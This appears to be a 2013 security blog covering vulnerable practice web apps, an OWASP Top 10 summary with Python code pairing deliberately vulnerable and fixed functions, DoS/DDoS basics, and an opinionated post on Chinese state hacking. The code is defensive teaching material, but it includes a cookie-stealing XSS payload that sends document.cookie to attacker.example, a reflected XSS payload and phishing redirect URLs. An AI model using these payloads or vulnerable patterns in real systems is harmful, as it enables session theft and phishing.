Tuesday, September 3, 2013

Web-Application Penetration Testing - List of Vulnerable Web Applications

Hi all of you out there….

This blog is dedicated to all those who want to learn and test their penetration testing skills.

Being a web application security enthusiast, I will be concentrating on "setting up a web-app pentesting lab".

IMPORTANT – Many people make the mistake of testing live applications on the public Internet. Testing a website without written permission can land the tester in serious legal trouble and can put a "full stop" to his/her information security career. Perform pentests only on web applications where you have proper permission to do so.

Someone new to web-app pentesting usually asks the following question:
If testing a live application without prior permission is illegal, how can I learn and test my skills?

Well, there is a simple solution to this question:
Set up your own lab and start pentesting.
At first this may sound a little cumbersome, but believe me, it is not that hard at all.
So what do you have to do to set up a lab?

Some may think they have to code and develop their own web application and then start pentesting it. If you are thinking that, relax: you don't need to do any coding. (Knowing how to code is definitely a plus, but it is not required for the setup.)

There are ready-made "vulnerable" web applications available on the Internet. You just need to download them, do a little configuration on your laptop/PC, and you are all set to go.

I will mention some of these "vulnerable" web applications here.

-----------------------------------------------------------------------------------------------------------


This is a web application designed with vulnerabilities already built into it.
For a newbie it is the perfect application to get started with.
There is a separate tab for each vulnerability class: just visit the tab and exploit that particular vulnerability.

The application has security levels (low, medium, high) built in.
It also bundles PHPIDS, an intrusion detection system written in PHP, which is disabled by default.
If you really want to test your skills, set the security level to "high" and enable PHPIDS. ;-)


-----------------------------------------------------------------------------------------------------------


The main thing I like about this web app is the way it implements the vulnerabilities:
they are arranged according to the ranking of the OWASP Top 10.

If you get stuck somewhere, don't worry: a "help" option is provided to ease your task.



-----------------------------------------------------------------------------------------------------------


OWASP WebGoat

OWASP WebGoat is another test web app that can be used to learn and sharpen your skills.
It is a realistic teaching environment that gives users hints and code to explain each lesson further.
This application is based on J2EE (Java). If you want to try the .NET version, visit OWASP WebGoat .NET.


-----------------------------------------------------------------------------------------------------------

Hackxor

If you don't want the "step-by-step" vulnerability exploitation of the applications above, try "Hackxor". It is a web-app hacking game in which players must locate and exploit vulnerabilities to progress through the story; it is a web app with a plot and a focus on realism and difficulty. Hackxor contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc.


-----------------------------------------------------------------------------------------------------------

Exploit.co.il

Another good vulnerable web application is "exploit.co.il".
This "Vulnerable Web App" is designed as a learning platform for testing various SQL injection techniques.
It is a fully functional website with a content management system based on FCKeditor.


-----------------------------------------------------------------------------------------------------------


BodgeIt

This is a good "vulnerable" web application that gives you the look and feel of exploiting a live application.
You can learn a lot with BodgeIt.
Like the examples above, this download also comes as a zipped file: just extract it and start using it.


-----------------------------------------------------------------------------------------------------------


WackoPicko

This vulnerable web application was written specifically to test automated web-vulnerability scanners, for the research paper "Why Johnny Can't Pentest" (I recommend reading it).

WackoPicko simulates a picture-sharing web app. Find the vulnerabilities and see the pictures that a normal user is not meant to see. ;-) It's fun to exploit this web app.


-----------------------------------------------------------------------------------------------------------


OWASP Hackademic Challenges

The OWASP Hackademic Challenges project implements realistic scenarios with known vulnerabilities in a safe, controllable environment.
Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security from the attacker's perspective.


------------------------------------------------------------------------------------------------------------

These are a few web applications that I found interesting.
They are safe from a legal perspective, and at the same time you will learn a lot from them.

All of the above are simple to set up: the download is a zipped file, you extract it and run it in an appropriate server environment. I used XAMPP.
Because these applications are deliberately insecure, run them only on a machine or VM that is not reachable from the Internet (for example, keep XAMPP bound to localhost) and stop the server when you are done; otherwise your lab becomes somebody else's target.

If you are not familiar with setting up XAMPP, click here. That link will help you set it up.
Don't go too deep into it.

If you are still not comfortable setting up XAMPP, let me know in the comments. I will try my best to help you out.

Hope this blog helps you and boost up your infosec career. 

Thank you..



Saturday, May 4, 2013

OWASP Top 10 - 2013 | Shivang Desai


An abstract of the OWASP Top 10 (2013).
I am currently kick-starting my information security career and have just begun with web application security.
For web application security, the best place to start is OWASP. Go to www.owasp.org to get a complete picture of what web application security is and how to perform it.
OWASP – Open Web Application Security Project.
OWASP categorizes web application risks and ranks them by overall risk, combining how easy each weakness is to exploit, how common and how detectable it is, and the technical impact it can cause.
OWASP's top 10 for 2013 is listed below.

Number  Top 10 (2013)                                  Attack Vector      Security Weakness                     Technical Impact
                                                       (Exploitability)   Prevalence (P) / Detectability (D)
------  ---------------------------------------------  -----------------  ------------------------------------  ----------------
A1      Injection                                      Easy               P: Common / D: Average                Severe
A2      Broken Authentication and Session Management   Average            P: Widespread / D: Average            Severe
A3      Cross-Site Scripting (XSS)                     Average            P: Very Widespread / D: Easy          Moderate
A4      Insecure Direct Object References              Easy               P: Common / D: Easy                   Moderate
A5      Security Misconfiguration                      Easy               P: Common / D: Easy                   Moderate
A6      Sensitive Data Exposure                        Difficult          P: Uncommon / D: Average              Severe
A7      Missing Function Level Access Control          Easy               P: Common / D: Average                Moderate
A8      Cross-Site Request Forgery (CSRF)              Average            P: Common / D: Easy                   Moderate
A9      Using Components with Known Vulnerabilities    Average            P: Widespread / D: Difficult          Moderate
A10     Unvalidated Redirects and Forwards             Average            P: Uncommon / D: Easy                 Moderate

Let's see an abstract of each of these.

 1.   Injection
At first a newbie may think this first OWASP category is only about SQL injection, but that is not the case. Injection flaws occur wherever untrusted data is sent to an interpreter as part of a command or query: SQL, LDAP or XPath queries, OS commands, program arguments, XML parsers, etc. Injection into an SQL query is what is called SQL injection.
https://www.owasp.org/index.php/Top_10_2013-A1


2.  Broken Authentication and Session Management
Developers frequently build their own authentication and session management schemes, but building them correctly is difficult, so these custom schemes often have flaws.
Major flaws are found in areas such as "logout", "password management", "remember me", "timeouts", "secret questions", "account update", etc. These flaws can also be exploited through XSS (for example, by stealing the session cookie), which is the next item in the OWASP Top 10.
https://www.owasp.org/index.php/Top_10_2013-Broken_Authentication_and_Session_Management


3.  Cross Site Scripting (XSS)
XSS is considered a serious flaw and is now third in the OWASP Top 10, down from second in the 2010 list.
XSS flaws occur when an application includes user-supplied data in a page sent to the browser without properly validating or escaping that content; the attacker's script then runs in the victim's browser with the victim's session.
There are three main types of XSS:
-Stored XSS (also called Persistent XSS).
-Reflected XSS.
-DOM-based XSS.
https://www.owasp.org/index.php/Top_10_2013-Cross-Site_Scripting_(XSS)
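The stored and reflected cases side by side with their escaped versions, as an added example written for this page (not code from OWASP or the original post). The comment list, the attacker's payloads and the page templates are constructed sample data; the fix is plain context-aware escaping with Python's `html.escape`:

```python
import html

# Constructed stored comments, as they would be read back from the database
# (sample data, not from the page). The second one is a cookie-stealing payload.
COMMENTS = [
    ("alice", "Nice photo!"),
    ("mallory", "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"),
]

# Constructed reflected payload: closes the attribute, then injects a script.
REFLECTED_PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_comments_vulnerable(comments):
    """Stored XSS: user-controlled text is pasted straight into the HTML,
    so every visitor who loads the page runs mallory's script."""
    items = "".join(f"<li><b>{user}</b>: {text}</li>" for user, text in comments)
    return f"<ul>{items}</ul>"


def render_comments_safe(comments):
    """Escape every untrusted value for the HTML context it lands in.
    quote=True also escapes quotes, so the same helper is safe inside a
    double-quoted attribute value."""
    items = "".join(
        f"<li><b>{html.escape(user, quote=True)}</b>: {html.escape(text, quote=True)}</li>"
        for user, text in comments
    )
    return f"<ul>{items}</ul>"


def render_search_vulnerable(query):
    """Reflected XSS: the search term from the URL is echoed back unescaped,
    both in element text and inside an attribute value."""
    return f'<p>Results for: {query}</p><input name="q" value="{query}">'


def render_search_safe(query):
    safe = html.escape(query, quote=True)
    return f'<p>Results for: {safe}</p><input name="q" value="{safe}">'


if __name__ == "__main__":
    print(render_comments_vulnerable(COMMENTS))
    print(render_comments_safe(COMMENTS))
    print(render_search_vulnerable(REFLECTED_PAYLOAD))
    print(render_search_safe(REFLECTED_PAYLOAD))
```

Escaping has to match the context: the HTML-text/attribute escaping shown here is not enough for data placed inside a `<script>` block, a URL or a CSS value, each of which needs its own encoding. DOM-based XSS is not covered by server-side escaping at all, since the injection happens in client-side JavaScript.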


4. Insecure Direct Object References.
Applications frequently expose the actual name or key of an internal object (a file name, a database record id) in the pages they generate, but do not always verify that the user is authorized for the target object. The result is an insecure direct object reference flaw: changing the reference in the request gives access to another user's data.
https://www.owasp.org/index.php/Top_10_2013-Insecure_Direct_Object_References


5.  Security Misconfigurations.
Security misconfiguration can occur at any level of the application stack, including the platform, web server, application server, framework and custom code (default accounts, unneeded services, verbose error messages, missing patches).
Occasionally this flaw leads to complete system compromise.
https://www.owasp.org/index.php/Top_10_2013-Security_Misconfiguration


6.  Sensitive Data Exposure.
The name explains itself: sensitive data belonging to clients or the company, such as login credentials or credit card numbers, is exposed. This is a weakness rather than a single attack technique.
It may be exploited by anyone who has access to the sensitive data or to a backup of it, and also when the data is stored or transmitted with weak or no encryption (for passwords, an unsalted fast hash is the usual mistake).
An external attacker may have trouble exploiting it directly due to limited access, which is why OWASP rates its exploitability as difficult.
https://www.owasp.org/index.php/Top_10_2013-Sensitive_Data_Exposure
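The "weak encryption" case for stored credentials, as an added example written for this page (not code from OWASP or the original post): an unsalted MD5 beside a salted, slow PBKDF2-HMAC-SHA256 hash with constant-time verification. The storage string format `pbkdf2_sha256$iterations$salt$digest` and the iteration count are assumptions of this example:

```python
import hashlib
import hmac
import os


def hash_password_weak(password):
    """Weak storage: unsalted, fast MD5. Equal passwords give equal hashes, and a
    leaked table falls to rainbow tables or GPU brute force in no time."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password, iterations=200_000):
    """Salted, slow hash (PBKDF2-HMAC-SHA256). The random salt defeats
    precomputation; the iteration count makes each guess expensive.
    Storage format (an assumption of this example):
    pbkdf2_sha256$iterations$salt_hex$digest_hex"""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and parameters; compare in constant time
    so the comparison itself does not leak how many bytes matched."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    print("weak:  ", hash_password_weak("hunter2"), hash_password_weak("hunter2"))
    stored = hash_password("hunter2")
    print("strong:", stored)
    print("verify correct:", verify_password("hunter2", stored))
    print("verify wrong:  ", verify_password("hunter3", stored))
```

Storing the parameters next to the digest lets you raise the iteration count later and re-hash users on their next login. A real application should prefer a purpose-built library (bcrypt, scrypt or Argon2) over hand-rolled PBKDF2, and should protect the data in transit with TLS, which is the other half of this category.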


7.  Missing function level Access Control
Applications do not always protect their functions properly, and this becomes an attack vector. Hiding a link from the menu is not protection: the server must check the user's permissions on every request to the function.
Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack.
https://www.owasp.org/index.php/Top_10_2013-Missing_Function_Level_Access_Control
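Items 4 and 7 are two halves of the same server-side check, so one added example covers both (written for this page, not code from OWASP or the original post). The invoice store, the role table, the `session_user` argument standing in for the identity taken from the session cookie, and the function names are all constructed for the demo:

```python
# Constructed data and session model for the demonstration (not from the page):
# "session_user" stands for the identity established from the session cookie.
INVOICES = {
    1001: {"owner": "alice", "amount": 120},
    1002: {"owner": "bob", "amount": 75},
}
ROLES = {"alice": "user", "bob": "user", "carol": "admin"}


class Forbidden(Exception):
    """Raised when the server-side check fails (map to HTTP 403 or 404)."""


# --- A4: object-level reference (IDOR) -------------------------------------

def get_invoice_vulnerable(session_user, invoice_id):
    """IDOR: the id comes from the URL (e.g. /invoice?id=1002) and is trusted as-is,
    so bob can read alice's invoice simply by changing the number."""
    return INVOICES[invoice_id]


def get_invoice_safe(session_user, invoice_id):
    """Look the object up, then verify the current user may see it. 'Not found'
    and 'not yours' get the same answer so valid ids cannot be enumerated."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None or invoice["owner"] != session_user:
        raise Forbidden()
    return invoice


# --- A7: function-level access --------------------------------------------

def requires_role(role):
    """Decorator that enforces the role check on the server for every call."""
    def decorator(fn):
        def wrapper(session_user, *args, **kwargs):
            if ROLES.get(session_user) != role:
                raise Forbidden()
            return fn(session_user, *args, **kwargs)
        return wrapper
    return decorator


def delete_user_vulnerable(session_user, target, users):
    """Missing function-level access control: the admin link is merely hidden in
    the UI; anyone who knows the URL (e.g. /admin/deleteUser) can call it."""
    users.pop(target, None)
    return target not in users


@requires_role("admin")
def delete_user_safe(session_user, target, users):
    users.pop(target, None)
    return target not in users


def is_forbidden(fn, *args):
    """True if fn(*args) is rejected by the access check."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("bob reads alice's invoice (vulnerable):", get_invoice_vulnerable("bob", 1001))
    print("bob reads alice's invoice (safe) forbidden:", is_forbidden(get_invoice_safe, "bob", 1001))
    print("bob deletes alice (safe) forbidden:", is_forbidden(delete_user_safe, "bob", "alice", dict(ROLES)))
    print("carol deletes alice (safe):", delete_user_safe("carol", "alice", dict(ROLES)))
```

The two checks answer different questions: "may this user touch this particular object?" (A4) and "may this user call this function at all?" (A7). Both must be enforced on the server for every request, never inferred from what the UI chose to show; the decorator pattern keeps the function-level check from being forgotten on a new admin endpoint.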


8. Cross Site Request Forgery ( CSRF )
CSRF is an attack that forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated: the browser attaches the session cookie to the forged request automatically. With a little social engineering (such as sending a link via email/chat), an attacker can make the users of a web application execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operations in the case of a normal user; if the targeted end user is an administrator account, it can compromise the entire web application.
https://www.owasp.org/index.php/Top_10_2013-Cross-Site_Request_Forgery_(CSRF)
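A money-transfer handler with and without a synchroniser token, as an added example written for this page (not code from OWASP or the original post). The token is an HMAC of the session id under a server secret; the secret generation, the `session_id` argument standing in for the cookie value, the form field names and the forged form are assumptions constructed for the demo:

```python
import hashlib
import hmac
import secrets

# Per-deployment secret. Assumption of this example: generated at process start;
# a real deployment loads it from configuration so tokens survive restarts.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token_for(session_id):
    """Token bound to the session: HMAC(secret, session id). The attacker's page
    cannot read it (same-origin policy), so it cannot appear in a forged form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(session_id, form):
    """Vulnerable: the browser attaches the session cookie to any POST to this URL,
    including one auto-submitted from an attacker's page, and nothing ties the
    request to a page the victim actually loaded from this site."""
    return {"from": session_id, "to": form["to"], "amount": int(form["amount"])}


def transfer_safe(session_id, form):
    """Reject the request unless it carries the token issued to this session.
    Compare in constant time, on bytes, so odd input cannot raise or leak."""
    expected = csrf_token_for(session_id).encode()
    supplied = str(form.get("csrf_token", "")).encode()
    if not hmac.compare_digest(supplied, expected):
        raise PermissionError("CSRF token missing or invalid")
    return {"from": session_id, "to": form["to"], "amount": int(form["amount"])}


def is_rejected(fn, *args):
    """True if fn(*args) is refused by the CSRF check."""
    try:
        fn(*args)
    except PermissionError:
        return True
    return False


# What a hidden auto-submitting form on attacker.example would send, with the
# victim's cookie attached by the browser (constructed sample, not from the page).
FORGED_FORM = {"to": "mallory", "amount": "1000"}

if __name__ == "__main__":
    print("vulnerable accepts forged form:", transfer_vulnerable("sess-victim", FORGED_FORM))
    print("safe rejects forged form:", is_rejected(transfer_safe, "sess-victim", FORGED_FORM))
    legit = dict(FORGED_FORM, csrf_token=csrf_token_for("sess-victim"))
    print("safe accepts form with token:", transfer_safe("sess-victim", legit))
```

The token must be placed in a hidden form field (or request header) of every state-changing form the site renders, never in the cookie alone, since the cookie is exactly what the attacker gets sent for free. Binding the token to the session with an HMAC avoids server-side token storage; a per-request random token kept in the session works equally well.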


9. Using Components with known vulnerabilities.
Components such as libraries, frameworks and other software modules almost always run with the full privileges of the application. Vulnerabilities in them are usually patched upstream, but developers are often unaware of which components (and which versions) their application uses and keep running the vulnerable ones. A component with a known vulnerability is exposed to the outside world and increases the risk of the whole web application.
https://www.owasp.org/index.php/Top_10_2013-Using_Components_with_Known_Vulnerabilities


10. Unvalidated Redirects and Forwards.
Applications frequently redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination: a link that starts at the trusted site but lands on a phishing page, or a forward to a page the user should not reach.
https://www.owasp.org/index.php/Top_10_2013-Unvalidated_Redirects_and_Forwards
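The usual `next=` parameter on a login page, as an added example written for this page (not code from OWASP or the original post): the unvalidated version beside one that accepts only site-local paths or an allowlisted host. The `ALLOWED_HOSTS` value and the parameter name are assumptions for the demo:

```python
from urllib.parse import urlsplit

# Assumption for the demo: the site's own public host name(s).
ALLOWED_HOSTS = {"www.example.com"}


def redirect_vulnerable(next_url):
    """Sends the user wherever ?next= says. A link such as
    https://www.example.com/login?next=https://evil.example/phish
    looks trustworthy but ends on the attacker's page."""
    return next_url or "/"


def safe_redirect_target(next_url, default="/"):
    """Return next_url only if it is a same-site path or an allowlisted
    absolute URL; otherwise fall back to a fixed default."""
    if not next_url:
        return default
    parts = urlsplit(next_url)
    if parts.scheme or parts.netloc:
        # Absolute URL (this branch also catches protocol-relative "//evil.example"
        # and "javascript:" style schemes): only http(s) to an allowlisted host.
        if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
            return next_url
        return default
    # Scheme-less: must be a single-slash path. Reject "/\evil.example", which
    # some browsers treat as "//evil.example".
    if next_url.startswith("/") and not next_url.startswith(("//", "/\\")):
        return next_url
    return default


if __name__ == "__main__":
    for candidate in [
        "/account/settings",
        "https://www.example.com/account",
        "https://evil.example/phish",
        "//evil.example/phish",
        "/\\evil.example",
        "javascript:alert(1)",
        "https://www.example.com@evil.example/",
    ]:
        print(f"{candidate!r:45} vulnerable -> {redirect_vulnerable(candidate)!r:45} safe -> {safe_redirect_target(candidate)!r}")
```

Comparing `parts.hostname` rather than the raw string is what defeats the `user@host` trick in the last case, where the text before `@` is userinfo and the real host is `evil.example`. The simplest hardening of all is to avoid redirect parameters entirely and map a short key to a fixed set of internal destinations.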




Saturday, April 27, 2013

DOS vs DDOS | Shivang Desai

Hey guys,

You must have seen your favorite website down or not working properly at some point.
It may have been due to a DoS or DDoS attack.
But what are DoS and DDoS attacks, basically? Let's look at an abstract introduction that clears up the basic definition of both types of attack and the difference between them.

DoS stands for "Denial of Service". In this attack the victim website (or rather, the victim's web server) is flooded with a huge number of requests, which keeps it so busy that it cannot handle legitimate requests any more. Flooding is the common form; other DoS attacks exhaust one specific resource, such as open connections or CPU time, with far fewer requests.
The largest attack reported in 2010 reached about 100 gigabits per second. That is a lot.

A DDoS attack has the same intention as a DoS attack, but there are a few differences between them.

DDoS stands for Distributed Denial of Service. It works on the same principle as a DoS attack, but the main difference is that the attack comes from many different sources.


You could say that a DoS attack is a one-to-one relationship and DDoS is many-to-one.
In a DDoS attack many computers attack the victim at the same time with a massive number of requests, which leaves the victim helpless: blocking a single source address, which is often enough against a DoS, no longer helps.

The computers behind a DDoS attack are distributed around the globe and could be anywhere.
They are usually compromised machines that have become part of something called a botnet, typically without their owners knowing.
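The one-to-one versus many-to-one distinction is visible in a web server's access log, and this added example (written for this page, not from the original post) shows a first-pass triage over one minute of constructed common-log-format lines: count requests per source, decide whether the flood comes from one address or from many, and list the addresses that a per-address block would actually catch. The log lines, the IP addresses and the thresholds are all constructed assumptions for the demo:

```python
import re
from collections import Counter

# Apache/nginx common log format. Constructed sample lines are generated below;
# nothing here is taken from a real server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


def make_log(requests):
    """Build constructed log lines for a one-minute window.
    requests: list of (source_ip, number_of_requests)."""
    lines = []
    for ip, n in requests:
        for i in range(n):
            lines.append(f'{ip} - - [27/Apr/2013:10:00:{i % 60:02d} +0000] "GET / HTTP/1.1" 200 512')
    return lines


def requests_per_source(lines):
    """Count requests per source address; malformed lines are skipped."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            counts[m.group("ip")] += 1
    return counts


def classify(counts, total_threshold=1000, single_source_share=0.8):
    """Rough triage of one window. The thresholds are assumptions for the demo
    and must be tuned to the site's normal traffic."""
    total = sum(counts.values())
    if total < total_threshold:
        return "normal"
    top_ip, top_count = counts.most_common(1)[0]
    if top_count / total >= single_source_share:
        return "dos"    # one address carries the flood: blocking it is enough
    return "ddos"       # the flood is spread over many addresses


def sources_over(counts, min_requests=50):
    """Addresses worth blocking individually. In a DDoS this list is often empty
    because each bot stays below any per-address limit."""
    return sorted(ip for ip, n in counts.items() if n >= min_requests)


if __name__ == "__main__":
    for name, traffic in [
        ("quiet", [("198.51.100.1", 20), ("198.51.100.2", 15)]),
        ("single-source flood", [("203.0.113.7", 5000), ("198.51.100.1", 30)]),
        ("botnet flood", [(f"192.0.2.{i}", 20) for i in range(1, 201)]),
    ]:
        c = requests_per_source(make_log(traffic))
        print(f"{name}: {classify(c)}, sources over limit: {len(sources_over(c))}")
```

In the botnet case the 200 sources send only 20 requests each, so none of them crosses a per-address limit and the aggregate count is the only signal; that is exactly why DDoS is handled upstream (rate limiting at the edge, scrubbing services) rather than with a firewall rule on the victim.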

Hope this short and simple introduction at least makes you aware of what DoS and DDoS are.

Thanks and enjoy the weekend.... :-)

Surf safe....Be Safe...



Friday, April 26, 2013

Chinese Cyber Army | Shivang Desai


Hey folks,
The days of simple hacking are fading and hacking has taken the route of cyber warfare.
Earlier we used to see news saying that 'xyz' website got hacked or defaced by some 'abc' hacker.
That is still the scenario, but now governments are also taking part in hacking, and this has given rise to cyber warfare.

China's Cyber Army
Nowadays China is growing drastically in fishy hacking activity.
The Indian government recently faced an attack. The attack vector was a simple email received by senior government officials. As soon as they opened it, data residing under 'C:\Program Files' on the computer was sent out somewhere.
Deep research by Rahul Sasi and his team (Garage4Hackers), presented at nullcon, found that the command and control centre of this malware was located in China.

That was the first scenario; the second reason that made me write this post is the incursion of the Chinese Army into India. They came 10 km inside the Indian border and the Chinese government denies it. Oh c'mon, grow up.

Looking at these scenarios, I thought I would write a post on the Chinese Cyber Army.
Unlike the US, China keeps its cyber activities secret.

The first question that comes to mind is: "what is the Chinese Cyber Army?"
Simply put, it is a group of hackers in China who perform cyber espionage.
The fact is that China itself is involved but denies it, stating that it is totally unaware of these groups.

Let China deny it, but at the same time there is de facto data that can show China is involved in cyber espionage.

Have you ever heard about “PLA”? It stands for People’s Liberation Army.
The PLA is the world's largest military force, with strength of approximately 2,250,000 personnel.
The PLA comprises five main service branches, consisting of :
PLA Ground Force, 
PLA Navy (PLAN), 
PLA Air Force (PLAAF), 
Second Artillery Corps (strategic missile force), and
the PLA Reserve Force.

(Image: a white 12-storey office building on the outskirts of Shanghai.)

Yeah, you guessed correctly. The white building in the picture is the 12-storey building that Mandiant identified as the headquarters of PLA Unit 61398.

According to American intelligence and the Mandiant report, an overwhelming percentage of the attacks on U.S. organizations, corporations and government agencies originate in and around this white building.
The detailed report (http://intelreport.mandiant.com/) by the well-known information security firm Mandiant describes the Chinese hacking group it calls APT1, also known as "Comment Crew" or the "Shanghai Group". The firm was not able to place the hackers inside the 12-storey building itself, but makes the case that there is no other plausible explanation for why so many attacks come out of one comparatively small area.
Kevin Mandia, the founder and chief executive of Mandiant, says: "Either the attacks are coming from the Unit 61398 or the people who run the most-controlled, most-monitored Internet networks in the world are clueless about thousands of people generating attacks from this one neighborhood."
Other security firms have also tracked the "Comment Crew" and concluded that the group is state-sponsored.
When the report was covered in the New York Times, officials at the Chinese embassy in Washington again insisted that their government does not engage in computer hacking and that such activity is illegal. LOL..

You may be wondering how someone can point directly at a country and say that it is involved in cyber-criminal activity. But let me tell you that this is not the first time China has shown its smartness.
Let's see some examples:

Larry Wu-Tai Chin

Larry Wu-Tai Chin worked in the U.S. intelligence community for close to 35 years, all the while providing the PRC (People's Republic of China) with sensitive classified information. Chin was recruited as a spy by a Chinese Communist official in 1948, while he was employed as an interpreter at the U.S. Consulate in Shanghai.

Peter Lee
Lee was a Chinese born physicist who worked at Los Alamos nuclear weapons laboratory, and later for TRW, a major California defense contractor. Lee pleaded guilty to lying on Security Clearance forms, and to passing classified national defense information to Chinese scientists on business trips to Beijing.

Chi Mak

Chi Mak is a Chinese-born engineer who worked for L-3 Communications, a California-based defense contractor. Chi worked as a support engineer on Navy quiet-drive propulsion technology. According to recovered documents, Chi was instructed by his Chinese contacts to join "more professional associations and participate in more seminars with 'special subject matters' and to compile special conference materials on disk".
There are many such examples, which clearly indicate that it is better to be wary of China. http://en.wikipedia.org/wiki/Chinese_intelligence_operations_in_the_United_States

Despite much evidence, it is still hard to pin down exactly what the Chinese Cyber Army is. It cannot be said with certainty that China is involved, but I will be waiting for that to be proved.
That's all for today, but I will be posting more evidence on the Chinese Cyber Army.